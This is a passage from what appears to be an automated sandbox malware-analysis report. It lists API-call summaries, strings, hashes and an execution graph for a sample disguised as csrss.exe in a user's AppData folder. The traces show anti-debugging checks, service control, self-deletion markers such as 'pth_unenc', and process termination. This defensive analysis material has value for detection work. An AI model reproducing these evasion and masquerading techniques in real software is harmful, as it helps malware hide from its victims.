                                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,33D5A6A0,00000000), ref: 33D5AA68
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,33D5A6A0,00000000), ref: 33D5AA75
                                                      • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,33D5A6A0,00000000), ref: 33D5AA80
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Service$Open$CloseHandleManagerStart
                                                      • String ID:
                                                      • API String ID: 2553746010-0
                                                      • Opcode ID: 1733d7f1de2e8ccad6543caf099375b73649283e9e79c37e49f61682573ab929
                                                      • Instruction ID: 7143e0a8ba1fd7039dda6efda5381deec21a43da2894e24b76516f483a4231a8
                                                      • Opcode Fuzzy Hash: 1733d7f1de2e8ccad6543caf099375b73649283e9e79c37e49f61682573ab929
                                                      • Instruction Fuzzy Hash: 28F0E9735013256FF211AB20CC89DFF2BACDF85691B010015F85AE20009F748C479971
                                                      APIs
                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,33DB4EF8,33D44E7A,00000001), ref: 33D45120
                                                      • SetEvent.KERNEL32(?), ref: 33D4512C
                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 33D45137
                                                      • CloseHandle.KERNEL32(?), ref: 33D45140
                                                        • Part of subcall function 33D5B4EF: GetLocalTime.KERNEL32(00000000), ref: 33D5B509
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                      • String ID:
                                                      • API String ID: 2993684571-0
                                                      • Opcode ID: 2e7921da8c3c7a45a91a357630b336e0b1cab7d8b8fc58b01a9b25cb5b59f5bd
                                                      • Instruction ID: 40483bf48574124e3a51b4b7298ad82bbeda9693dc9462177a23576a06b3e51c
                                                      • Opcode Fuzzy Hash: 2e7921da8c3c7a45a91a357630b336e0b1cab7d8b8fc58b01a9b25cb5b59f5bd
                                                      • Instruction Fuzzy Hash: 35F0E976C04300FFEB203BB4CD0996A7FD9AB06210F40055DF8D391661CE714455DF62
                                                      APIs
                                                      • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,33D5CDED), ref: 33D5CD62
                                                      • GetConsoleScreenBufferInfo.KERNEL32(00000000,?), ref: 33D5CD6F
                                                      • SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 33D5CD7C
                                                      • SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 33D5CD8F
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                      • String ID:
                                                      • API String ID: 3024135584-0
                                                      • Opcode ID: ad05129efe52554edfdcc5d9418f04f88b9da5733427132706100b7b4ae818b6
                                                      • Instruction ID: 5df9b33dbf84c8efefb09fbbf777777a0f4353634b4b82d09bd18fbc3b021df3
                                                      • Opcode Fuzzy Hash: ad05129efe52554edfdcc5d9418f04f88b9da5733427132706100b7b4ae818b6
                                                      • Instruction Fuzzy Hash: A9E04873900304ABE71037B5DC4DDAB7BACF745626B100656FA13B1182997044458671
                                                      APIs
                                                      • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 33D78F31
                                                      • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 33D78F36
                                                      • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 33D78F3B
                                                        • Part of subcall function 33D7A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 33D7A44B
                                                      • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 33D78F50
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                      • String ID:
                                                      • API String ID: 1761009282-0
                                                      • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                      • Instruction ID: 1e87cec3c3a6db31621faecac389800d9771f1df95f6054e5112ce263bf4d25a
                                                      • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                      • Instruction Fuzzy Hash: 2EC04809C0878568BC847EF0620629D834A2F62ACABC464DA8CDCA7E02CE0B000B6237
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-
                                                      • API String ID: 1302938615-2137968064
                                                      • Opcode ID: 2c53b2485f5ea0e8d1fa6fabd9bd7dffc814f05ba4e877e743aa15997dc192b1
                                                      • Instruction ID: 9d5ee863cda05d81f62809d6d46e73dd1e3ee7b0ee3cc328925533abcea7c104
                                                      • Opcode Fuzzy Hash: 2c53b2485f5ea0e8d1fa6fabd9bd7dffc814f05ba4e877e743aa15997dc192b1
                                                      • Instruction Fuzzy Hash: 6491E2B4D043499FEF10CE68C8506EDBBB5EF45764F58825AE8F4AB390D7309902CB61
                                                      APIs
                                                      • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 33D58ABE
                                                      • SHCreateMemStream.SHLWAPI(00000000), ref: 33D58B0B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: CreateStream
                                                      • String ID: image/jpeg
                                                      • API String ID: 1369699375-3785015651
                                                      • Opcode ID: 3622cac1d5dbdfd4c53dd8ab55c7df5e732a0569ea6e7064e947a89e4dff7be6
                                                      • Instruction ID: 2e86f8a88654003c3778d2ff756a30712924b820a2c838ba07e920e5c0fbe01e
                                                      • Opcode Fuzzy Hash: 3622cac1d5dbdfd4c53dd8ab55c7df5e732a0569ea6e7064e947a89e4dff7be6
                                                      • Instruction Fuzzy Hash: AE314B72A15304AFD701DF65C884D6FBBE9FF8A704F00095EF986D7210DB7599058BA2
                                                      APIs
                                                      • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,33D91D92,?,00000050,?,?,?,?,?), ref: 33D91C12
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ACP$OCP
                                                      • API String ID: 0-711371036
                                                      • Opcode ID: 3b2fd2cbe42bfb69931606489b3e547aa3661c40705ceb8cea143528814c2a03
                                                      • Instruction ID: 5bde384f49d3dbd3094f0a9cb4b8f44bbf5bcc73a333606521dc6ca2ec8e39eb
                                                      • Opcode Fuzzy Hash: 3b2fd2cbe42bfb69931606489b3e547aa3661c40705ceb8cea143528814c2a03
                                                      • Instruction Fuzzy Hash: 0D21C86AA44301A6F715CF64C901BCB73AFEF45FA9F8A4564E94AD7600F732D940C390
                                                      APIs
                                                      • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 33D58BAA
                                                      • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 33D58BCF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: CreateStream
                                                      • String ID: image/png
                                                      • API String ID: 1369699375-2966254431
                                                      • Opcode ID: 462550aca72f385f9ae166bcd9722931fe9944283d5c0c064441ee4a2149571e
                                                      • Instruction ID: 06ccfce7c9fec8c7737fe1331a7be7020120ef44138d0ebebb60ac8a2d908dbe
                                                      • Opcode Fuzzy Hash: 462550aca72f385f9ae166bcd9722931fe9944283d5c0c064441ee4a2149571e
                                                      • Instruction Fuzzy Hash: C6219D32A05314AFC700EB64CC88CAFBBADEF8A650B10091DF50693210DF3499468BA2
                                                      APIs
                                                      • CoInitializeEx.OLE32(00000000,00000002), ref: 33D475D0
                                                        • Part of subcall function 33D474FD: CoGetObject.OLE32(?,00000024,33DA6518,00000000), ref: 33D47582
                                                      • CoUninitialize.OLE32 ref: 33D47629
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: InitializeObjectUninitialize
                                                      • String ID: C:\Users\user\AppData\Roaming\csrss.exe
                                                      • API String ID: 887581436-2596686549
                                                      • Opcode ID: 2db6717ebd8f30ee2435f3b12548fd46905b4f5b0ac192066333fb235936a6b3
                                                      • Instruction ID: 667ac956ab94f42e554bbdbc76dcefe19e6db528d032b75a2477a7b2d0e517c9
                                                      • Opcode Fuzzy Hash: 2db6717ebd8f30ee2435f3b12548fd46905b4f5b0ac192066333fb235936a6b3
                                                      • Instruction Fuzzy Hash: 57012476605300AFF3646B78ED4DF6B378DDF40B69F14081EF92596082EFA0AC054AB0
                                                      APIs
                                                        • Part of subcall function 33D88215: GetLastError.KERNEL32(?,?,33D85591,33DAEA10,0000000C,33D74B93), ref: 33D88219
                                                        • Part of subcall function 33D88215: _free.LIBCMT ref: 33D8824C
                                                        • Part of subcall function 33D88215: SetLastError.KERNEL32(00000000), ref: 33D8828D
                                                        • Part of subcall function 33D88215: _abort.LIBCMT ref: 33D88293
                                                      • _abort.LIBCMT ref: 33D8F0A9
                                                      • _free.LIBCMT ref: 33D8F0DD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast_abort_free
                                                      • String ID: XKz
                                                      • API String ID: 289325740-1051961590
                                                      • Opcode ID: 1407a27e88305560ec2c22134000bd3628591f597b22fd3d465a3a5bbd97b39a
                                                      • Instruction ID: 1d37696c8c5e9af7f922f128c6a8843ea6b2fc57f1cc96f6e24ab95db7642929
                                                      • Opcode Fuzzy Hash: 1407a27e88305560ec2c22134000bd3628591f597b22fd3d465a3a5bbd97b39a
                                                      • Instruction Fuzzy Hash: 29018BB6D11B21DFCB219F69D40021DB7A8FF04B62B58030AD8A16FA80CB3039528FD1
                                                      APIs
                                                      • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 33D4B876
                                                      • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 33D4B8A1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: DeleteDirectoryFileRemove
                                                      • String ID: pth_unenc
                                                      • API String ID: 3325800564-4028850238
                                                      • Opcode ID: c5e9f30218c6f1e2f685a259df5a2c4109ba23022fb8cb3a28fb0429f03f8418
                                                      • Instruction ID: 7cc0f1c64ada3b3e1026e528448ff46ad2b45aab83bce4d9817d0e294d3aa053
                                                      • Opcode Fuzzy Hash: c5e9f30218c6f1e2f685a259df5a2c4109ba23022fb8cb3a28fb0429f03f8418
                                                      • Instruction Fuzzy Hash: 34E08C765407118BC750AB35C948ADA339CAF18115B40040AE493A3501DF70A90AC670
                                                      APIs
                                                      • TerminateProcess.KERNEL32(00000000,pth_unenc,33D4F8C8), ref: 33D52860
                                                      • WaitForSingleObject.KERNEL32(000000FF), ref: 33D52873
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: ObjectProcessSingleTerminateWait
                                                      • String ID: pth_unenc
                                                      • API String ID: 1872346434-4028850238
                                                      • Opcode ID: 9e2347224abc4bc749bcbeb5146fd6495c8f86bff1f9b5f755e37ef4b0bb9c1c
                                                      • Instruction ID: e466d34fe6148f0c65c11806f243af6ec83aea9a90e5564c58adb217f2a2598f
                                                      • Opcode Fuzzy Hash: 9e2347224abc4bc749bcbeb5146fd6495c8f86bff1f9b5f755e37ef4b0bb9c1c
                                                      • Instruction Fuzzy Hash: 78D0C937289212EBD7662F60CD48B093AD8A7057A1F540305B461752E4D7654516EBD0
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 33D80D27
                                                      • GetLastError.KERNEL32 ref: 33D80D35
                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 33D80D90
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                      • String ID:
                                                      • API String ID: 1717984340-0
                                                      • Opcode ID: 72f214b30b7a31a0438d8df5d67accc07137fdd02f0cc510d0b626a2bd9807b8
                                                      • Instruction ID: 83617da317bf4f9069cd5ad07b0480d5bde12434d573cfa9d9362b63a95c544a
                                                      • Opcode Fuzzy Hash: 72f214b30b7a31a0438d8df5d67accc07137fdd02f0cc510d0b626a2bd9807b8
                                                      • Instruction Fuzzy Hash: 83412A79A00306BFDB118F75EC44BAA7BA8EF05764F148169F894AF690DB34B901C7A0

                                                      Execution Graph

                                                      Execution Coverage:3.4%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0.6%
                                                      Total number of Nodes:511
                                                      Total number of Limit Nodes:28
                                                      execution_graph 50581 2d26ae66 50586 2d25a7b7 50581->50586 50587 2d25a7d4 50586->50587 50588 2d25a7ca 50586->50588 50587->50588 50621 2d268215 35 API calls 2 library calls 50587->50621 50594 2d26ac49 50588->50594 50590 2d25a7f5 50622 2d268364 35 API calls __fassign 50590->50622 50592 2d25a80e 50623 2d268391 35 API calls __fassign 50592->50623 50595 2d26ac64 50594->50595 50596 2d26ac8a MultiByteToWideChar 50595->50596 50597 2d26acb4 50596->50597 50598 2d26ae3e 50596->50598 50604 2d26acd5 _strftime 50597->50604 50632 2d266137 21 API calls 3 library calls 50597->50632 50636 2d254fcb 50598->50636 50600 2d26ae51 50602 2d26ad8a 50635 2d255e40 20 API calls _free 50602->50635 50603 2d26ad1e MultiByteToWideChar 50603->50602 50605 2d26ad37 50603->50605 50604->50602 50604->50603 50624 2d268bb3 50605->50624 50609 2d26ad61 50609->50602 50613 2d268bb3 _strftime 11 API calls 50609->50613 50610 2d26ad99 50615 2d26adba _strftime 50610->50615 50633 2d266137 21 API calls 3 library calls 50610->50633 50612 2d26ae2f 50634 2d255e40 20 API calls _free 50612->50634 50613->50602 50615->50612 50616 2d268bb3 _strftime 11 API calls 50615->50616 50617 2d26ae0e 50616->50617 50617->50612 50618 2d26ae1d WideCharToMultiByte 50617->50618 50618->50612 50619 2d26ae5d 50618->50619 50643 2d255e40 20 API calls _free 50619->50643 50621->50590 50622->50592 50623->50588 50644 2d2684ca 50624->50644 50628 2d268c23 LCMapStringW 50629 2d268be3 50628->50629 50630 2d254fcb new 5 API calls 50629->50630 50631 2d268c35 50630->50631 50631->50602 50631->50609 50631->50610 50632->50604 50633->50615 50634->50602 50635->50598 50637 2d254fd4 50636->50637 50638 2d254fd6 IsProcessorFeaturePresent 50636->50638 50637->50600 50640 2d255018 50638->50640 50659 2d254fdc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 50640->50659 50642 2d2550fb 50642->50600 50643->50602 50645 2d2684f6 50644->50645 50646 2d2684fa 50644->50646 50645->50646 50648 2d26851a 50645->50648 50652 2d268566 50645->50652 50646->50629 50651 2d268c3b 10 API calls 3 library calls 50646->50651 50648->50646 50649 2d268526 GetProcAddress 50648->50649 50650 2d268536 __crt_fast_encode_pointer 50649->50650 50650->50646 50651->50628 50653 2d268587 LoadLibraryExW 50652->50653 50657 2d26857c 50652->50657 50654 2d2685a4 GetLastError 50653->50654 50655 2d2685bc 50653->50655 50654->50655 50658 2d2685af LoadLibraryExW 50654->50658 50656 2d2685d3 FreeLibrary 50655->50656 50655->50657 50656->50657 50657->50645 50658->50655 50659->50642 50660 2c97f38 50663 2c8d754 50660->50663 50662 2c97f40 50664 2c8d75c 50663->50664 50664->50664 53113 2c8d574 GetModuleHandleW 50664->53113 50666 2c8d778 50667 2c97151 50666->50667 53117 2c8d5d0 GetModuleHandleW 50666->53117 53151 2c744d0 50667->53151 50672 2c744d0 11 API calls 50674 2c9717e 50672->50674 50675 2c744d0 11 API calls 50674->50675 50677 2c9718e 50675->50677 50680 2c744d0 11 API calls 50677->50680 50678 2c8d79a 53125 2c8d6d4 GetModuleHandleW 50678->53125 50682 2c9719e 50680->50682 50683 2c744d0 11 API calls 50682->50683 50685 2c971ae 50683->50685 53155 2c74c0c 50685->53155 50688 2c8d7b4 53133 2c72ee0 QueryPerformanceCounter 50688->53133 50692 2c8d7b9 50695 2c8d7c3 InetIsOffline 50692->50695 50694 2c74c0c SysFreeString 50696 2c971cf 50694->50696 50697 2c8d7cd 50695->50697 50698 2c8d7de 50695->50698 50699 2c744d0 11 API calls 50696->50699 53145 2c74500 50697->53145 50702 2c74500 11 API calls 50698->50702 50701 2c971df 50699->50701 50704 2c744d0 11 API calls 50701->50704 50705 2c8d7ed 50702->50705 50707 2c971ef 50704->50707 53136 2c7480c 50705->53136 50708 2c744d0 11 API calls 50707->50708 50710 2c971ff 50708->50710 50711 2c744d0 11 API calls 50710->50711 50712 2c9720f 50711->50712 50714 2c74c0c SysFreeString 50712->50714 50715 2c9721a 50714->50715 50717 2c744d0 11 API calls 50715->50717 50718 2c9722a 50717->50718 50719 2c74c0c SysFreeString 50718->50719 50720 2c97235 50719->50720 50722 2c744d0 11 API calls 50720->50722 50723 2c97245 50722->50723 50725 2c744d0 11 API calls 50723->50725 50727 2c97255 50725->50727 50729 2c744d0 11 API calls 50727->50729 50731 2c97265 50729->50731 50732 2c744d0 11 API calls 50731->50732 50733 2c97275 50732->50733 50735 2c744d0 11 API calls 50733->50735 50736 2c97285 50735->50736 50738 2c744d0 11 API calls 50736->50738 50739 2c97295 50738->50739 50740 2c744d0 11 API calls 50739->50740 50741 2c972a5 50740->50741 53162 2c75788 13 API calls 50741->53162 50744 2c972b6 50746 2c744d0 11 API calls 50744->50746 50748 2c972c6 50746->50748 50750 2c744ac 11 API calls 50748->50750 50752 2c972d1 50750->50752 50753 2c744d0 11 API calls 50752->50753 50755 2c972e1 50753->50755 50756 2c744d0 11 API calls 50755->50756 50757 2c972f1 50756->50757 53163 2c7e36c 52 API calls 50757->53163 50761 2c972fc 50762 2c744d0 11 API calls 50761->50762 50763 2c9730c 50762->50763 50766 2c744d0 11 API calls 50763->50766 50768 2c97327 50766->50768 50770 2c744d0 11 API calls 50768->50770 50771 2c97337 50770->50771 50772 2c744d0 11 API calls 50771->50772 50773 2c97347 50772->50773 50775 2c744d0 11 API calls 50773->50775 50777 2c97357 50775->50777 53164 2c75788 13 API calls 50777->53164 50780 2c97368 50781 2c744d0 11 API calls 50780->50781 50782 2c97378 50781->50782 53165 2c75788 13 API calls 50782->53165 50785 2c97389 50787 2c744d0 11 API calls 50785->50787 50789 2c97399 50787->50789 50791 2c74c0c SysFreeString 50789->50791 50792 2c973a4 50791->50792 50793 2c744ac 11 API calls 50792->50793 50794 2c973af 50793->50794 50796 2c744ac 11 API calls 50794->50796 50797 2c973ba 50796->50797 50799 2c744d0 11 API calls 50797->50799 50802 2c973ca 50799->50802 50803 2c744d0 11 API calls 50802->50803 50804 2c973da 50803->50804 50806 2c74c0c SysFreeString 50804->50806 50807 2c973e5 50806->50807 50809 2c744d0 11 API calls 50807->50809 50811 2c973f5 50809->50811 53166 2c75788 13 API calls 50811->53166 50815 2c97406 50816 2c744d0 11 API calls 50815->50816 50817 2c97416 50816->50817 50818 2c74c0c SysFreeString 50817->50818 50820 2c97421 50818->50820 50822 2c744d0 11 API calls 50820->50822 50824 2c97431 50822->50824 50826 2c744d0 11 API calls 50824->50826 50828 2c97441 50826->50828 50829 2c744d0 11 API calls 50828->50829 50830 2c97451 50829->50830 50832 2c744d0 11 API calls 50830->50832 50834 2c97461 50832->50834 50835 2c744ac 11 API calls 50834->50835 50837 2c97469 50835->50837 50839 2c744d0 11 API calls 50837->50839 50841 2c97479 50839->50841 50843 2c744d0 11 API calls 50841->50843 50845 2c97486 50843->50845 50845->50662 53114 2c8d59d 53113->53114 53115 2c8d586 GetProcAddress 53113->53115 53114->50666 53116 2c8d595 53115->53116 53116->50666 53118 2c8d5ec GetProcAddress 53117->53118 53119 2c8d616 53117->53119 53118->53119 53120 2c8d600 53118->53120 53119->50667 53121 2c8d654 GetModuleHandleW 53119->53121 53120->53119 53122 2c8d670 GetProcAddress 53121->53122 53123 2c8d69e 53121->53123 53122->53123 53124 2c8d684 NtQueryInformationProcess 53122->53124 53123->50667 53123->50678 53124->53123 53126 2c8d6f0 GetProcAddress 53125->53126 53127 2c8d71f 53125->53127 53126->53127 53128 2c8d704 NtQueryInformationProcess 53126->53128 53127->50667 53129 2c8cc94 GetTickCount 53127->53129 53128->53127 53167 2c77a78 53129->53167 53132 2c8ccc7 53132->50667 53132->50688 53134 2c72eed 53133->53134 53135 2c72ef8 GetTickCount 53133->53135 53134->50692 53135->50692 53137 2c7481d 53136->53137 53138 2c74843 53137->53138 53139 2c7485a 53137->53139 53172 2c74b78 53138->53172 53181 2c74570 53139->53181 53142 2c74850 53143 2c7488b 53142->53143 53144 2c74500 11 API calls 53142->53144 53144->53143 53146 2c74504 53145->53146 53147 2c74514 53145->53147 53146->53147 53149 2c74570 11 API calls 53146->53149 53148 2c74542 53147->53148 53188 2c72c2c 11 API calls 53147->53188 53148->50705 53149->53147 53153 2c744d6 53151->53153 53152 2c744fc 53152->50672 53153->53152 53189 2c72c2c 11 API calls 53153->53189 53156 2c74c12 SysFreeString 53155->53156 53157 2c74c20 53155->53157 53156->53157 53158 2c744ac 53157->53158 53159 2c744b2 53158->53159 53161 2c744cd 53158->53161 53159->53161 53190 2c72c2c 11 API calls 53159->53190 53161->50694 53162->50744 53163->50761 53164->50780 53165->50785 53166->50815 53168 2c77a88 53167->53168 53169 2c77aa9 Sleep GetTickCount 53168->53169 53171 2c7760c 42 API calls 53168->53171 53169->53132 53171->53169 53173 2c74b85 53172->53173 53180 2c74bb5 53172->53180 53175 2c74bae 53173->53175 53177 2c74b91 53173->53177 53174 2c744ac 11 API calls 53176 2c74b9f 53174->53176 53178 2c74570 11 API calls 53175->53178 53176->53142 53186 2c72c44 11 API calls 53177->53186 53178->53180 53180->53174 53182 2c74574 53181->53182 53183 2c74598 53181->53183 53187 2c72c10 11 API calls 53182->53187 53183->53142 53185 2c74581 53185->53142 53186->53176 53187->53185 53188->53148 53189->53153 53190->53161 53191 2d224e26 WaitForSingleObject 53192 2d224e40 SetEvent CloseHandle 53191->53192 53193 2d224e57 closesocket 53191->53193 53194 2d224ed8 53192->53194 53195 2d224e64 53193->53195 53196 2d224e7a 53195->53196 53204 2d2250e4 85 API calls 53195->53204 53198 2d224ece SetEvent CloseHandle 53196->53198 53199 2d224e8c WaitForSingleObject 53196->53199 53198->53194 53205 2d23e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53199->53205 53201 2d224e9b SetEvent WaitForSingleObject 53206 2d23e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53201->53206 53203 2d224eb3 SetEvent CloseHandle CloseHandle 53203->53198 53204->53196 53205->53201 53206->53203 53207 2d265af3 53212 2d265b00 _strftime 53207->53212 53208 2d265b40 53215 2d2605dd 20 API calls _abort 53208->53215 53209 2d265b2b RtlAllocateHeap 53210 2d265b3e 53209->53210 53209->53212 53212->53208 53212->53209 53214 2d262f80 7 API calls new 53212->53214 53214->53212 53215->53210 53216 2d2633d1 53219 2d26319c 53216->53219 53220 2d2631a8 _abort 53219->53220 53221 2d2631c1 53220->53221 53222 2d2631af 53220->53222 53243 2d265888 EnterCriticalSection 53221->53243 53255 2d2632f6 GetModuleHandleW 53222->53255 53225 2d2631b4 53225->53221 53256 2d26333a GetModuleHandleExW 53225->53256 53230 2d2631c8 53238 2d26323d 53230->53238 53241 2d263266 53230->53241 53264 2d263f50 20 API calls _abort 53230->53264 53231 2d263283 53247 2d2632b5 53231->53247 53232 2d2632af 53267 2d277729 5 API calls new 53232->53267 53240 2d263255 53238->53240 53265 2d2641f5 5 API calls new 53238->53265 53266 2d2641f5 5 API calls new 53240->53266 53244 2d2632a6 53241->53244 53243->53230 53268 2d2658d0 LeaveCriticalSection 53244->53268 53246 2d26327f 53246->53231 53246->53232 53269 2d268cc9 53247->53269 53250 2d2632e3 53252 2d26333a _abort 8 API calls 53250->53252 53251 2d2632c3 GetPEB 53251->53250 53253 2d2632d3 GetCurrentProcess TerminateProcess 53251->53253 53254 2d2632eb ExitProcess 53252->53254 53253->53250 53255->53225 53257 2d263387 53256->53257 53258 2d263364 GetProcAddress 53256->53258 53259 2d263396 53257->53259 53260 2d26338d FreeLibrary 53257->53260 53261 2d263379 53258->53261 53262 2d254fcb new 5 API calls 53259->53262 53260->53259 53261->53257 53263 2d2631c0 53262->53263 53263->53221 53264->53238 53265->53240 53266->53241 53268->53246 53270 2d268cee 53269->53270 53274 2d268ce4 53269->53274 53271 2d2684ca _abort 5 API calls 53270->53271 53271->53274 53272 2d254fcb new 5 API calls 53273 2d2632bf 53272->53273 53273->53250 53273->53251 53274->53272 53275 2d23be1b 53297 2d2220df 11 API calls 53275->53297 53277 2d23be2e 53280 2d23bea0 53277->53280 53296 2d23be9e 53277->53296 53298 2d2241a2 30 API calls 53277->53298 53299 2d221fe2 30 API calls 53277->53299 53300 2d221fd8 11 API calls 53277->53300 53301 2d23ce34 53277->53301 53279 2d23bed0 53316 2d221fd8 11 API calls 53279->53316 53312 2d2241a2 30 API calls 53280->53312 53284 2d23bed8 53317 2d221fd8 11 API calls 53284->53317 53285 2d23beac 53313 2d221fe2 30 API calls 53285->53313 53289 2d23bee0 53290 2d23beb5 53314 2d221fd8 11 API calls 53290->53314 53293 2d23bebd 53294 2d23ce34 30 API calls 53293->53294 53294->53296 53315 2d221fd8 11 API calls 53296->53315 53297->53277 53298->53277 53299->53277 53300->53277 53302 2d23ce41 53301->53302 53303 2d23cea0 53302->53303 53307 2d23ce51 53302->53307 53304 2d23ceba 53303->53304 53305 2d23cfe0 29 API calls 53303->53305 53327 2d23d146 30 API calls 53304->53327 53305->53304 53309 2d23ce89 53307->53309 53318 2d23cfe0 53307->53318 53326 2d23d146 30 API calls 53309->53326 53311 2d23ce9c 53311->53277 53312->53285 53313->53290 53314->53293 53315->53279 53316->53284 53317->53289 53320 2d23cfe8 53318->53320 53319 2d23d01a 53319->53309 53320->53319 53321 2d23d01e 53320->53321 53324 2d23d002 53320->53324 53338 2d222725 22 API calls 53321->53338 53328 2d23d051 53324->53328 53326->53311 53327->53311 53329 2d23d05b __EH_prolog 53328->53329 53339 2d222717 23 API calls 53329->53339 53331 2d23d06e 53340 2d23d15d 11 API calls 53331->53340 53333 2d23d094 53335 2d23d0cc 53333->53335 53341 2d222730 11 API calls 53333->53341 53335->53319 53336 2d23d0b3 53342 2d222712 11 API calls std::_Deallocate 53336->53342 53339->53331 53340->53333 53341->53336 53342->53335 53343 2c71c6c 53344 2c71d04 53343->53344 53345 2c71c7c 53343->53345 53348 2c71d0d 53344->53348 53349 2c71f58 53344->53349 53346 2c71cc0 53345->53346 53347 2c71c89 53345->53347 53350 2c71724 10 API calls 53346->53350 53351 2c71c94 53347->53351 53391 2c71724 53347->53391 53353 2c71d25 